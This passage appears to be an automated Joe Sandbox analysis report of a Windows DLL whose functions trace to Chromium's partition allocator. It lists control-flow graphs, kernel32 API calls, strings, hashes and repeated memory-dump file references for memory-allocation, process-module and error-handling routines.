                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CD4A8D8
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 6CD4A8E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: 20b2923dc6a211139a759e0075ea88bce17ed65dc544cc9418ac900a10fa3e00
                                                                                                        • Instruction ID: 04e992bd37a6d0f3b3fde03129daa5506087da36eaa192ffe43518423dc120ac
                                                                                                        • Opcode Fuzzy Hash: 20b2923dc6a211139a759e0075ea88bce17ed65dc544cc9418ac900a10fa3e00
                                                                                                        • Instruction Fuzzy Hash: DA31F27490122CABCB61DF64C888BCCBBB8BF08314F5081EAE51CA7260E7749F858F54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 7$F
                                                                                                        • API String ID: 0-2956078852
                                                                                                        • Opcode ID: 35f44488e7151a4f7c36dc4fe382e0a7814bdfc3b63c3aae44167d024a917e88
                                                                                                        • Instruction ID: 6e1558239bae48d94e440ccd519b9356a92c64e47b10dc9c1926fbeab33f7498
                                                                                                        • Opcode Fuzzy Hash: 35f44488e7151a4f7c36dc4fe382e0a7814bdfc3b63c3aae44167d024a917e88
                                                                                                        • Instruction Fuzzy Hash: 8B31D474E09259DFCB15CFA8D980A9DBBF0FF0A304F14009AE815EB311D335AA4ACB25

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 493 6cbf19f0-6cbf1a14 VirtualAlloc 494 6cbf1a1a-6cbf1a22 493->494 495 6cbf1c54-6cbf1c58 493->495 494->495 496 6cbf1a28-6cbf1a2a 494->496 496->495 497 6cbf1a30-6cbf1a32 496->497 497->495 498 6cbf1a38-6cbf1a47 GetLastError 497->498 499 6cbf1a49-6cbf1a4e 498->499 500 6cbf1a54-6cbf1a6c Sleep VirtualAlloc 498->500 499->500 501 6cbf1c52 499->501 500->495 502 6cbf1a72-6cbf1a81 GetLastError 500->502 501->495 503 6cbf1a8e-6cbf1aa6 Sleep VirtualAlloc 502->503 504 6cbf1a83-6cbf1a88 502->504 503->495 505 6cbf1aac-6cbf1abb GetLastError 503->505 504->501 504->503 506 6cbf1abd-6cbf1ac2 505->506 507 6cbf1ac8-6cbf1ae0 Sleep VirtualAlloc 505->507 506->501 506->507 507->495 508 6cbf1ae6-6cbf1af5 GetLastError 507->508 509 6cbf1af7-6cbf1afc 508->509 510 6cbf1b02-6cbf1b1a Sleep VirtualAlloc 508->510 509->501 509->510 510->495 511 6cbf1b20-6cbf1b2f GetLastError 510->511 512 6cbf1b3c-6cbf1b54 Sleep VirtualAlloc 511->512 513 6cbf1b31-6cbf1b36 511->513 512->495 514 6cbf1b5a-6cbf1b69 GetLastError 512->514 513->501 513->512 515 6cbf1b6b-6cbf1b70 514->515 516 6cbf1b76-6cbf1b8e Sleep VirtualAlloc 514->516 515->501 515->516 516->495 517 6cbf1b94-6cbf1ba3 GetLastError 516->517 518 6cbf1ba5-6cbf1baa 517->518 519 6cbf1bb0-6cbf1bc8 Sleep VirtualAlloc 517->519 518->501 518->519 519->495 520 6cbf1bce-6cbf1bdd GetLastError 519->520 521 6cbf1bdf-6cbf1be4 520->521 522 6cbf1be6-6cbf1bfe Sleep VirtualAlloc 520->522 521->501 521->522 522->495 523 6cbf1c00-6cbf1c0f GetLastError 522->523 524 6cbf1c18-6cbf1c30 Sleep VirtualAlloc 523->524 525 6cbf1c11-6cbf1c16 523->525 524->495 526 6cbf1c32-6cbf1c41 GetLastError 524->526 525->501 525->524 527 6cbf1c4a-6cbf1c4c Sleep 526->527 528 6cbf1c43-6cbf1c48 526->528 527->501 528->501 528->527
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,00000000,?,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000), ref: 6CBF1A0B
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A38
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A56
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A64
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A72
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A90
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A9E
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1AAC
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1ACA
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1AD8
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1AE6
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B04
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B12
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B20
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B3E
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B4C
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B5A
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B78
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B86
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B94
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BB2
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BC0
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BCE
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BE8
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BF6
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C00
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C1A
                                                                                                        • VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C28
                                                                                                        • GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C32
                                                                                                        • Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C4C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocErrorLastSleepVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2288223010-0
                                                                                                        • Opcode ID: 7acebf5aa351ddcd91a2f36398c3ec7d187d2f40ba9ae2ba950b642f628970e5
                                                                                                        • Instruction ID: 8b4607a51f2a0ac8bd02ea1ae09f26c51e592a3f1b69f70f1b4b0150fbf0922f
                                                                                                        • Opcode Fuzzy Hash: 7acebf5aa351ddcd91a2f36398c3ec7d187d2f40ba9ae2ba950b642f628970e5
                                                                                                        • Instruction Fuzzy Hash: 79516F70715142AFCF214E92CD1DB9E3F79FF46399F184828FA2A98550D739C54ACB22

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6CBF541E
                                                                                                        • IsWow64Process.KERNEL32(00000000,00000000), ref: 6CBF542A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentWow64
                                                                                                        • String ID: allo$c$comm$iswo$it$ize$size$va_s$w64
                                                                                                        • API String ID: 1905925150-3570837082
                                                                                                        • Opcode ID: 7bd8e93bb75e07341b2aad1e93c6b042f6e3ce6dcd04ba9645c1a598b4f233a9
                                                                                                        • Instruction ID: 9d6c5aebfc40692fc208e0085b0a602eb9cb252cbf97d34a290a5c11f5b06115
                                                                                                        • Opcode Fuzzy Hash: 7bd8e93bb75e07341b2aad1e93c6b042f6e3ce6dcd04ba9645c1a598b4f233a9
                                                                                                        • Instruction Fuzzy Hash: F0315EB59083409BD704CFA4D485B9BBBF9BB85308F144A2DF5A987300D7B6E90D8B83

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6CBF10D0
                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000000,00000000,?), ref: 6CBF1119
                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000,?), ref: 6CBF1134
                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000000,?,?), ref: 6CBF1150
                                                                                                        • K32GetModuleInformation.KERNEL32(?,00000000,?,0000000C), ref: 6CBF11B1
                                                                                                        • K32GetModuleFileNameExA.KERNEL32(?,?,?,00000104), ref: 6CBF138D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$EnumModuleModules$AllocFileInformationLocalNameOpen
                                                                                                        • String ID: #%d 0x%x (%s+0x%x)$#%d 0x%x <unknown>
                                                                                                        • API String ID: 2294107655-2545250934
                                                                                                        • Opcode ID: 55f9941d9e40c45c38e5d0d5cb117e9d9df6c20dd1fedd224506498bdd865692
                                                                                                        • Instruction ID: ae94eeb8eab409cd505f28a8f29bb7f36b1a4ea3bf83504eb5ec96084dfff3e6
                                                                                                        • Opcode Fuzzy Hash: 55f9941d9e40c45c38e5d0d5cb117e9d9df6c20dd1fedd224506498bdd865692
                                                                                                        • Instruction Fuzzy Hash: 92C151B1910F819AE330CF25C885BA3F7E4BB99314F100B1DE5EA86A91DBB1F549C790

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1196 6cbf2270-6cbf2279 1197 6cbf227b-6cbf2281 1196->1197 1198 6cbf22c1-6cbf22f3 call 6cbefd00 TryAcquireSRWLockExclusive 1196->1198 1200 6cbf229e-6cbf22a3 1197->1200 1201 6cbf22aa-6cbf22b1 1197->1201 1202 6cbf2288-6cbf2295 VirtualFree 1197->1202 1203 6cbf2297-6cbf229c 1197->1203 1204 6cbf22a5 1197->1204 1208 6cbf22ff-6cbf2307 1198->1208 1209 6cbf22f5-6cbf22fa call 6cbf60e0 1198->1209 1200->1201 1207 6cbf22b2 call 6cbf19f0 1201->1207 1206 6cbf22ba-6cbf22c0 1202->1206 1203->1201 1204->1201 1210 6cbf22b7 1207->1210 1212 6cbf2309-6cbf231f VirtualFree 1208->1212 1213 6cbf2366-6cbf238c ReleaseSRWLockExclusive call 6cd2b4d8 1208->1213 1209->1208 1210->1206 1214 6cbf234b-6cbf235c 1212->1214 1215 6cbf2321-6cbf2346 call 6cbefc80 call 6cbefcd0 call 6cbefce0 1212->1215 1214->1213 1215->1214
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(00000003,00000000,00004000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF228F
                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(6CF3A804), ref: 6CBF22EB
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6CBF2317
                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6CF3A804), ref: 6CBF2370
                                                                                                        Strings
                                                                                                        • ..\base\allocator\partition_allocator\page_allocator_internals_win.h, xrefs: 6CBF2333
                                                                                                        • ..\base\allocator\partition_allocator\page_allocator_internals_win.h(100) PA_NOTREACHED() hit., xrefs: 6CBF22C1
                                                                                                        • VirtualFree(reinterpret_cast<void*>(address), 0, 0x00008000), xrefs: 6CBF2329
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExclusiveFreeLockVirtual$AcquireRelease
                                                                                                        • String ID: ..\base\allocator\partition_allocator\page_allocator_internals_win.h$..\base\allocator\partition_allocator\page_allocator_internals_win.h(100) PA_NOTREACHED() hit.$VirtualFree(reinterpret_cast<void*>(address), 0, 0x00008000)
                                                                                                        • API String ID: 448536242-2024906012
                                                                                                        • Opcode ID: 3311baa090f3df800ed313d266bce9312a5b9b39624eec26067addbeff0befb5
                                                                                                        • Instruction ID: bb07afdd91c49a22993dadcfa3e15e9831488bc5a9a154653d9d9e95ccb3f37b
                                                                                                        • Opcode Fuzzy Hash: 3311baa090f3df800ed313d266bce9312a5b9b39624eec26067addbeff0befb5
                                                                                                        • Instruction Fuzzy Hash: 4A2108707402857BEF105BE59C4CB6E33BAEB85748F108418ED295BB80CB39A95B86D6

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1468 6cbeff50-6cbf009a FormatMessageA 1469 6cbf0127-6cbf01a9 GetLastError 1468->1469 1470 6cbf00a0-6cbf00b0 call 6cbf1020 1468->1470 1471 6cbf01ae-6cbf01e0 call 6cbf0670 call 6cbf0510 call 6cd2b4d8 1469->1471 1476 6cbf00b6-6cbf0122 1470->1476 1477 6cbf00b2 1470->1477 1476->1471 1477->1476
                                                                                                        APIs
                                                                                                        • FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00000100,00000000), ref: 6CBF0092
                                                                                                        • GetLastError.KERNEL32(?,00000100,00000000), ref: 6CBF0127
                                                                                                          • Part of subcall function 6CBF1020: _strlen.LIBCMT ref: 6CBF102D
                                                                                                          • Part of subcall function 6CBF1020: ___from_strstr_to_strchr.LIBCMT ref: 6CBF1049
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
